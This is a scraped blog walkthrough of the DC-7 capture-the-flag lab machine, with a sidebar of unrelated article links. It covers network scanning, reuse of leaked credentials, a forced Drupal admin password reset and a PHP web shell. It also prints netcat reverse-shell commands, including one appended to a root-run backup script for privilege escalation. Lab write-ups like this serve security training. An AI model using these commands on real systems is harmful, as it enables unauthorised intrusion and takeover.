当前位置:网站首页>Dc-7 target
Dc-7 target
2022-07-07 06:06:00 【m0_ sixty-two million ninety-four thousand eight hundred and fo】
ifconfig
Find the host IP
Sweep a wave Intranet , Detect the surviving host
nmap 192.168.61.0/24
Use nmap Tool pair DC-5 The target machine scans the open port
nmap -A -T4 192.168.61.136 -p- -oN nmap136.A
nmap -A -T4 192.168.61.136 -p- -oN nmap136.A
Yes 22 and 80 port
Here's a hint DC7USER
use Baidu Search
You can download a file
This also shows that it is important
Download to kali Local
git clone https://github.com/Dc7User/staffdb
cd staffdb
ls
cat config.php
Use SSH Link target , Sign in dc7user It is found that you can successfully connect
ls
find out backups mbox
backups Next :website.sql.gpg website.tar.gz.gpg
Found two files , But it's all about gpg At the end of the ,gpg The command is used to encrypt files , The encrypted files are all garbled
mbox It's a document
The source code of backup execution is found in /opt/scripts Under the table of contents
Get into /opt/scripts Under the table of contents
cd /opt/scripts
see file
cat backups.sh
Found two commands gpg drush
gpg The command is used to encrypt ,drush The order is drupal Commands used in the framework to do some configuration , It can change the user name and password
Enter into /var/www/html Under the table of contents , Because the website will have a admin user , So use drush Command to change admin The user's password is 123456, It is found that it can be modified successfully
cd /var/www/html/
drush user-password admin --password="123456"
admin Your password has been changed to 123456
use dirb Command to scan out the page
dirb http://192.168.61.136
stay Content—>Add content-->Basic page Next , Ready to add PHP Code bounce shell, But found that it does not support PHP
After Baidu knows ,php To be imported as a separate module
PHP Module download address :
https://ftp.drupal.org/files/projects/php-8.x-1.0.tar.gz
Check , Then click the bottom install
And then it's all right
Go back to the page at that time , You can use PHP 了
You can connect successfully with ant sword
And then use kali monitor
nc -lvvp 4444
nc -e /bin/bash 192.168.61.129 4444
python -c 'import pty;pty.spawn("/bin/bash")'
Successful connection
find / -name backups.sh 2>/dev/null
then
cd /opt/scripts
ls -l
echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f | /bin/sh -i 2>&1 | nc 192.168.61.129 7777 >/tmp/f" >> backups.sh
nc -lvvp 7777
Got it root jurisdiction
cd /root
ls
cat theflag.txt
边栏推荐
- 毕业之后才知道的——知网查重原理以及降重举例
- Modes of optical fiber - single mode and multimode
- PTA ladder game exercise set l2-004 search tree judgment
- The boss always asks me about my progress. Don't you trust me? (what do you think)
- Red Hat安装内核头文件
- cf:C. Column Swapping【排序 + 模擬】
- Loss function and positive and negative sample allocation in target detection: retinanet and focal loss
- How to improve website weight
- Pytorch builds neural network to predict temperature
- Say sqlyog deceived me!
猜你喜欢
随机推荐
Bbox regression loss function in target detection -l2, smooth L1, IOU, giou, Diou, ciou, focal eiou, alpha IOU, Siou
软件测试面试技巧
Go语学习笔记 - gorm使用 - gorm处理错误 | Web框架Gin(十)
盘点国内有哪些EDA公司?
JVM命令之 jstack:打印JVM中线程快照
PTA ladder game exercise set l2-004 search tree judgment
make makefile cmake qmake都是什么,有什么区别?
Why does the data center need a set of infrastructure visual management system
[daily training -- Tencent selected 50] 292 Nim games
A freshman's summary of an ordinary student [I don't know whether we are stupid or crazy, but I know to run forward all the way]
JVM监控及诊断工具-命令行篇
What EDA companies are there in China?
绕过open_basedir
JVM命令之- jmap:导出内存映像文件&内存使用情况
Storage of dental stem cells (to be continued)
力扣102题:二叉树的层序遍历
Flask1.1.4 Werkzeug1.0.1 源碼分析:啟動流程
980. Different path III DFS
毕业之后才知道的——知网查重原理以及降重举例
PTA 天梯赛练习题集 L2-003 月饼 测试点2,测试点3分析